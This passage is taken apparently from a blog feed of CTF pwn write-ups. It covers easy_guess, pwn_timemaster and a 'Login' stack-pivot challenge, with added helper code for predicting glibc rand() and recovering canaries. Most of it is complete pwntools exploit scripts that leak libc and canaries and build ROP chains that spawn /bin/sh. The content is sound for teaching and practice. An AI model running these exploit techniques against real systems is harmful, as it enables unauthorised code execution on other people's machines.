class="line">27</span><br><span 
class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./guess"</span><br>elf = 
ELF(banary)<br>libc = ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6"</span>)<br><span class="hljs-comment">#libc=cdll.LoadLibrary("/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span 
class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br><span class="hljs-comment">#num=libc.time(0)</span><br><span class="hljs-comment">#libc.srand(num)</span><br><br>ru(<span class="hljs-string">"Enter the size :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">100</span>))<br>ru(<span class="hljs-string">"Enter the number of tries :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br>ru(<span class="hljs-string">"Enter your guess :"</span>)<br><span class="hljs-comment">#num=libc.rand()</span><br><span class="hljs-comment">#sl(str(num))</span><br><br><span class="hljs-comment">#gdb.attach(io,'b *$rebase(0x0000000000001458)')</span><br><span class="hljs-comment">#pause()</span><br>sl(<span class="hljs-string">b'-'</span>)<br><span class="hljs-comment">#pause()</span><br>ru(<span class="hljs-string">b'You entered '</span>)<br>base = <span class="hljs-built_in">int</span>(ru(<span class="hljs-string">b' '</span>)[:-<span class="hljs-number">1</span>]) - <span class="hljs-number">0x1579</span><br>lg(<span class="hljs-string">"base:"</span>+<span class="hljs-built_in">hex</span>(base))<br>pop_rdi=base+<span class="hljs-number">0x0000000000001793</span><br>ret=base+<span class="hljs-number">0x000000000000101a</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]+base<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]+base<br>back=base+<span class="hljs-number">0x000000000001436</span><br><br>ru(<span 
class="hljs-string">"> \n"</span>)<br><span class="hljs-comment">#payload=b'A'*0x18+p64(0xdeadbeef)+p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(back)</span><br><span class="hljs-comment">#payload=payload.ljust(0x858,b'\x00')+p64(0xdeadbeef)</span><br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">8</span><br><span class="hljs-comment">#pause()</span><br>sl(payload)<br>libcbase=uu64()-libc.sym[<span class="hljs-string">'puts'</span>]<br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><br>ru(<span class="hljs-string">"> \n"</span>)<br><span class="hljs-comment">#pause()</span><br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x18</span>+p64(<span class="hljs-number">0xdeadbeef</span>)+p64(<span class="hljs-number">0</span>)+p64(ret)*<span class="hljs-number">0x23</span>+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>io.sendline(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="pwn-timemaster"><a href="#pwn-timemaster" class="headerlink" title="pwn_timemaster"></a>pwn_timemaster</h1><p>Control the size of the stack area that alloca requests (the exp answers 14 to the number of tries) so that the slot read when '-' skips the time input is the canary: the program prints that uninitialized double, and double_to_hex in the exp turns the printed decimal back into the canary bytes. With the canary known, the stack overflow in ask_again is used for ret2libc: puts leaks a libc pointer first, execution returns into ask_again, and the second payload calls system("/bin/sh").</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><code class="hljs python"><span 
class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span 
class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">double_to_hex</span>(<span class="hljs-params">f</span>):<br> <span class="hljs-keyword">return</span> struct.unpack(<span class="hljs-string">'<Q'</span>, struct.pack(<span class="hljs-string">'<d'</span>, <span class="hljs-built_in">float</span>(f)))[<span class="hljs-number">0</span>]<br><br>ru(<span class="hljs-string">"What is your name?\n>"</span>)<br>payload=<span class="hljs-string">b'/bin/sh'</span><br>sl(payload)<br><br>ru(<span class="hljs-string">"How many times do you want to try?\n>"</span>)<br>gdb.attach(io,<span class="hljs-string">'b *0x0000000000400956'</span>)<br>pause()<br><span class="hljs-comment">#dbg()</span><br>sl(<span class="hljs-string">b'14'</span>)<br>pause()<br><br>ru(<span class="hljs-string">"Time[sec]:"</span>)<br>sl(<span class="hljs-string">b'-'</span>)<br><br>s(<span class="hljs-string">b'\n'</span>)<br>s(<span class="hljs-string">b'\n'</span>)<br>ru(<span class="hljs-string">b'Stop the timer as close to '</span>)<br>text = ru(<span class="hljs-string">b' '</span>)<br>canary = double_to_hex(text)<br>lg(<span 
class="hljs-string">"canary:"</span>+<span class="hljs-built_in">hex</span>(canary))<br><br>pop_rdi=<span class="hljs-number">0x0000000000400e93</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]<br>ret=<span class="hljs-number">0x00000000004006a6</span><br><br>ru(<span class="hljs-string">b' (Y/n) '</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x18</span>+p64(canary)+<span class="hljs-string">b'A'</span>*<span class="hljs-number">8</span>+p64(pop_rdi)+p64(<span class="hljs-number">0x601ff0</span>)+p64(puts_plt)+p64(elf.sym[<span class="hljs-string">'ask_again'</span>])<br>sl(payload)<br>libcbase=uu64()-<span class="hljs-number">0x23fc0</span><br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br><br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x18</span>+p64(canary)+p64(<span class="hljs-number">0</span>)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
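<![CDATA[
The easy_guess writeup above obtains the expected numbers by calling rand() from the local libc through ctypes, which only works when the local and remote libc behave the same. As an added example that is not part of the original post, the following pure-Python reimplementation of glibc's default random() generator (the TYPE_3 additive feedback generator that rand() uses) reproduces the sequence for any seed: an unseeded program such as easy_guess corresponds to seed 1, and the optional modulo covers the common rand() % N pattern. The seeding loop and the 310 discarded outputs follow glibc's __srandom_r; nothing here is taken from the challenge binary.

```python
"""Predict glibc rand() output without calling the local libc through ctypes.

Added example, not from the original post: a pure-Python reimplementation of
glibc's default random() generator (TYPE_3: additive feedback, degree 31,
separation 3). easy_guess calls rand() without srand(), which glibc treats as
srand(1), so predict_rand(3) gives the three numbers the exp has to send.
"""


def _c_divmod(a, b):
    """C99 division: quotient truncates toward zero, remainder takes a's sign."""
    q = abs(a) // abs(b)
    if (a < 0) != (b < 0):
        q = -q
    return q, a - q * b


def glibc_srand(seed):
    """Build the 31-word state glibc's __srandom_r leaves behind for srand(seed)."""
    seed &= 0xFFFFFFFF
    if seed == 0:            # glibc substitutes 1 for a zero seed
        seed = 1
    r = [seed]
    # glibc keeps the LCG value in an int32_t, so seeds >= 2^31 start negative
    word = seed - (1 << 32) if seed >= (1 << 31) else seed
    # r[i] = 16807 * r[i-1] mod (2^31 - 1), written as glibc does it
    # (Schrage's method) so that the C integer semantics are matched exactly
    for _ in range(1, 31):
        hi, lo = _c_divmod(word, 127773)
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r.append(word)
    for i in range(31, 34):   # the first three feedback terms reuse r[0..2]
        r.append(r[i - 31])
    for i in range(34, 344):  # glibc discards 10 * 31 outputs after seeding
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
    return r[-31:]            # the last 31 words are enough to continue


def glibc_rand_stream(seed=1):
    """Yield successive rand() results of a glibc program that called srand(seed)."""
    state = glibc_srand(seed)
    while True:
        word = (state[-31] + state[-3]) & 0xFFFFFFFF
        state.append(word)
        del state[0]
        yield word >> 1       # rand() returns the 32-bit word shifted right by one


def predict_rand(count, seed=1, modulo=None):
    """First `count` values of rand() (or rand() % modulo) after srand(seed).

    An unseeded program behaves like srand(1).
    """
    stream = glibc_rand_stream(seed)
    values = [next(stream) for _ in range(count)]
    if modulo is not None:
        values = [v % modulo for v in values]
    return values


if __name__ == "__main__":
    # The three guesses easy_guess expects from an unseeded target
    for guess in predict_rand(3):
        print(guess)
```

For a target that calls srand(time(NULL)), pass int(time.time()) as the seed and also try the neighbouring seconds to absorb clock skew between the exp and the server.
]]>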
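<![CDATA[
The pwn_timemaster exp recovers the canary from a double the program prints and converts the decimal text back into 8 bytes with double_to_hex. Whether that round trip is lossless depends on how many digits the program printed and on the bit pattern itself, so as an added example that is not part of the original post, the helpers below make the conditions explicit: a pattern printed with 17 significant digits comes back intact, the same pattern printed with plain %f loses its low bits, a NaN pattern cannot be recovered at all, and a genuine glibc x86-64 canary always has a zero lowest byte, which serves as a sanity check on the result. The canary value and the printf formats used here are constructed for the demonstration, not taken from the challenge.

```python
"""Turn a canary leaked as printed double text back into its 8 bytes.

Added example, not from the original post. pwn_timemaster's double_to_hex()
does float(text) -> struct.pack('<d') -> struct.unpack('<Q'); these helpers
show when that is exact and add the sanity check a glibc x86-64 canary passes.
"""
import math
import struct


def qword_to_double(q):
    """Reinterpret a 64-bit little-endian pattern as the double it overlays."""
    return struct.unpack("<d", struct.pack("<Q", q))[0]


def text_to_qword(text):
    """Parse printed decimal text as a double and return its 64-bit pattern."""
    return struct.unpack("<Q", struct.pack("<d", float(text)))[0]


def leak_roundtrips(q, printf_fmt):
    """True if printing pattern q with printf_fmt and parsing it back yields q.

    "%.17g" always round-trips a finite double; "%f" keeps only six decimals,
    so low mantissa bits of a value with a fractional part are lost; any NaN
    prints as "nan" and its payload bits are gone.
    """
    return text_to_qword(printf_fmt % qword_to_double(q)) == q


def recover_canary(text):
    """Canary from the leaked text, or ValueError if the bytes cannot be right."""
    value = float(text)
    if math.isnan(value):
        raise ValueError("printed as NaN: the canary bits are not recoverable")
    q = text_to_qword(text)
    if q & 0xFF:
        raise ValueError("lowest byte is not 0x00: not a glibc canary")
    return q


if __name__ == "__main__":
    # Constructed canary: the bit pattern of 3.14 with the lowest byte cleared
    canary = 0x40091EB851EB8500
    for fmt in ("%.17g", "%f"):
        print(fmt, "round-trips:", leak_roundtrips(canary, fmt))
    print(hex(recover_canary("%.17g" % qword_to_double(canary))))
```
]]>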
</entry>
<entry>
<title>Stack pivoting: the modify-rbp approach</title>
<link href="/2023/09/25/%E6%A0%88%E8%BF%81%E7%A7%BB-%E6%94%B9rbp%E6%89%93%E6%B3%95/"/>
<url>/2023/09/25/%E6%A0%88%E8%BF%81%E7%A7%BB-%E6%94%B9rbp%E6%89%93%E6%B3%95/</url>
<content type="html"><![CDATA[<h1 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h1><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251935879.png" alt="Untitled"></p><p>buf overflows by 0x10 bytes, just enough to control the saved rbp and the return address; the program then also reads a second input into .bss (that write is not needed for the rbp-control approach).</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python">bss=elf.bss(<span class="hljs-number">0x800</span>)<br>pop_rdi=<span class="hljs-number">0x00000000004013d3</span><br>leave=<span class="hljs-number">0x000000000040136e</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]<br>ret=<span class="hljs-number">0x000000000040101a</span><br>ptr_addr = <span class="hljs-number">0x401316</span><br>pop_rbp=<span class="hljs-number">0x00000000004011bd</span><br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0xf0</span>+p64(bss+<span 
class="hljs-number">0xf0</span>)+p64(ptr_addr)<br>s(payload)<br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>payload=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rbp)+p64(elf.bss(<span class="hljs-number">0xbf8</span>))+p64(ptr_addr)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(bss-<span class="hljs-number">0x8</span>)+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>libcbase=uu64()-libc.sym[<span class="hljs-string">'puts'</span>]<br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br></code></pre></td></tr></table></figure><p>The trick reuses the program's own read call:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251932904.png"></p><p>That read addresses its buffer relative to rbp and writes to rbp-0xf0. With rbp set to bss+0xf0 by the first overflow and the return address pointing at the read (ptr_addr), the next input lands at bss, so a ROP chain can be placed in .bss. When the function then executes leave; ret, rsp becomes bss+0xf0, rbp is loaded with bss-0x8 and control goes to the leave; ret gadget, which pivots rsp onto the chain at bss: it leaks libc with puts, sets rbp to elf.bss(0xbf8) with pop rbp and returns into the read once more.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python">payload=p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(elf.bss(<span class="hljs-number">0xb00</span>))+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span 
class="hljs-string">b'AAAA'</span>)<br><br>ia()<br></code></pre></td></tr></table></figure><p>The third input is read to elf.bss(0xbf8)-0xf0 = elf.bss(0xb08) and carries the system("/bin/sh") chain; its saved-rbp slot holds elf.bss(0xb00), so the final leave; ret pivots there and runs ret, pop rdi, "/bin/sh", system.</p><p>Full exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span 
class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> operator <span class="hljs-keyword">import</span> le<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><br>banary = <span class="hljs-string">"./login"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br>libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">'175.20.7.11'</span><br>port = <span class="hljs-number">9999</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : 
io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>bss=elf.bss(<span class="hljs-number">0x800</span>)<br>pop_rdi=<span class="hljs-number">0x00000000004013d3</span><br>leave=<span class="hljs-number">0x000000000040136e</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]<br>ret=<span class="hljs-number">0x000000000040101a</span><br>ptr_addr = <span class="hljs-number">0x401316</span><br>pop_rbp=<span 
class="hljs-number">0x00000000004011bd</span><br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0xf0</span>+p64(bss+<span class="hljs-number">0xf0</span>)+p64(ptr_addr)<br>s(payload)<br><br>ru(<span class="hljs-string">"Enter your password:"</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>payload=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rbp)+p64(elf.bss(<span class="hljs-number">0xbf8</span>))+p64(ptr_addr)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(bss-<span class="hljs-number">0x8</span>)+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>libcbase=uu64()-libc.sym[<span class="hljs-string">'puts'</span>]<br>lg(<span class="hljs-string">"libcbase:"</span>+<span class="hljs-built_in">hex</span>(libcbase))<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br><br>payload=p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>payload=payload.ljust(<span class="hljs-number">0xf0</span>,<span class="hljs-string">b'\x00'</span>)+p64(elf.bss(<span class="hljs-number">0xb00</span>))+p64(leave)<br>s(payload)<br><br>sleep(<span class="hljs-number">1</span>)<br>s(<span class="hljs-string">b'AAAA'</span>)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
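<content type="html"><![CDATA[<p>Added example, not part of the original write-up: a Python model of the three-stage rbp pivot used above. It emulates only the gadgets the chain needs (pop rdi, pop rbp, leave, ret, the puts PLT stub, and ptr_addr, modelled as read(0, rbp-0xf0, 0x100) followed by leave; ret) and replays the exploit's three payloads against a sparse fake memory. The gadget addresses are the ones from the exploit; BSS0, PUTS_PLT, PUTS_GOT, STACK_RBP and the libc offsets are assumed placeholders that differ for the real binary. exploit() records where each read() wrote and what puts() and system() were called with, which shows why the third chain starts at elf.bss(0xb08) while rbp points at elf.bss(0xb00).</p>
```python
import struct

# Gadget addresses copied from the exploit on the page.
POP_RDI  = 0x4013d3   # pop rdi ; ret
POP_RBP  = 0x4011bd   # pop rbp ; ret
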